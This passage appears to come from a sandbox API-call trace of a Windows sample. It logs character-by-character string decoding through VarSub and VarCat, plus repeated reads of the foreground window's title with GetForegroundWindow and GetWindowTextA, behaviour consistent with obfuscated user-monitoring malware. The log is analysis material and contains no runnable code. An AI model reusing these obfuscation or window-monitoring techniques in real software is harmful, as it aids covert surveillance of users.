VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.891] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.892] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.892] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.893] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.893] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.893] GetForegroundWindow () returned 0x10080 [0086.893] GetLastError () returned 0x0 [0086.893] SysStringLen (param_1=" ") returned 0xff [0086.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.894] SysStringLen (param_1=" ") returned 0xff [0086.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.894] GetWindowTextA (in: hWnd=0x10080, lpString=0xe577bc, nMaxCount=255 | out: lpString="") returned 0 [0086.894] GetLastError () returned 0x0 [0086.894] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.894] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="") returned 256 [0086.895] SysStringLen (param_1="") returned 0x4 [0086.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=5, lpMultiByteStr=0xe57084, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 5 [0086.895] SetWindowTextA (hWnd=0x2036e, lpString="") returned 1 [0086.895] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0086.895] GetFocus () returned 0x0 [0086.895] lstrlenA (lpString="") returned 0 [0086.895] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe57084) returned 0x1 [0086.895] IsWindow (hWnd=0x2036e) returned 1 [0086.895] IsWindow (hWnd=0x2036e) returned 1 [0086.896] IsWindow (hWnd=0x2036e) returned 1 [0086.896] IsWindow (hWnd=0x2036e) returned 1 [0086.896] GetFocus () returned 0x0 [0086.896] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0086.896] GetFocus () returned 0x0 [0086.896] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310bcd0 [0086.896] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x1, lParam=0x310bcd0) returned 0x0 [0086.897] GetFocus () returned 0x0 [0086.897] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.897] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.898] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.898] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86", lpUsedDefaultChar=0x0) returned 1 [0086.898] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0086.899] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.899] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.899] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.900] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.900] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.901] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.901] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.902] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.902] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.903] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.903] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.904] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.904] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.905] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.905] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.905] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.906] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.906] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.907] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.907] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.907] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.908] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.908] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.908] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.909] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.909] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.909] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.910] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.910] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.911] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.911] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.911] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.912] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.912] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.912] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.913] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.913] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.914] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.914] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.914] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.915] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.915] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.915] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.916] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.916] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.916] GetForegroundWindow () returned 0x102c2 [0086.917] GetLastError () returned 0x0 [0086.917] SysStringLen (param_1=" ") returned 0xff [0086.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.917] SysStringLen (param_1=" ") returned 0xff [0086.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.917] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.917] GetLastError () returned 0x0 [0086.917] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.918] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.918] SysStringLen (param_1="Acti") returned 0x4 [0086.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0xe570fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0086.918] SetWindowTextA (hWnd=0x2036e, lpString="Acti") returned 1 [0086.918] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0086.919] GetFocus () returned 0x0 [0086.919] lstrlenA (lpString="Acti") returned 4 [0086.919] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe570fc) returned 0x1 [0086.919] IsWindow (hWnd=0x2036e) returned 1 [0086.919] IsWindow (hWnd=0x2036e) returned 1 [0086.920] IsWindow (hWnd=0x2036e) returned 1 [0086.920] IsWindow (hWnd=0x2036e) returned 1 [0086.920] GetFocus () returned 0x0 [0086.920] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0086.920] GetFocus () returned 0x0 [0086.920] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x5) returned 0x310bcd0 [0086.921] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x5, lParam=0x310bcd0) returned 0x4 [0086.921] GetFocus () returned 0x0 [0086.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0086.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0xe570fc, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0086.921] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.921] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0086.922] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0086.922] VarCat (in: pvarLeft=0x28f1e8, 